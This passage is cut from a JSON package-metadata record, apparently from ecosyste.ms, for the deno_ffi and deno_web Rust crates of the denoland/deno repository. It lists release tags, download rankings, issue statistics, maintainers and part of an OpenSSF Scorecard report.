:"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T13:36:09.895Z","dependent_packages_count":8,"downloads":552821,"downloads_period":"total","dependent_repos_count":26,"rankings":{"downloads":5.857014657493269,"dependent_repos_count":5.415086861253823,"dependent_packages_count":4.22818591153196,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.722321852399851},"purl":"pkg:cargo/deno_ffi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_ffi","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_ffi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_ffi/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ffi/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:26.036Z","updated_at":"2022-11-07T18:29:26.036Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:25.617Z","updated_at":"2023-07-18T22:41:25.617Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047682,"name":"deno_web","ecosystem":"cargo","description":"Collection of Web APIs","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":297,"first_release_published_at":"2020-08-06T17:10:49.552Z","latest_release_published_at":"2026-08-27T15:20:12.590Z","latest_release_number":"0.289.0","last_synced_at":"2026-08-31T15:11:21.412Z","created_at":"2022-04-12T10:02:05.004Z","updated_at":"2026-08-31T15:19:49.849Z","registry_url":"https://crates.io/crates/deno_web/","install_command":"cargo install deno_web","documentation_url":"https://docs.rs/deno_web/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set 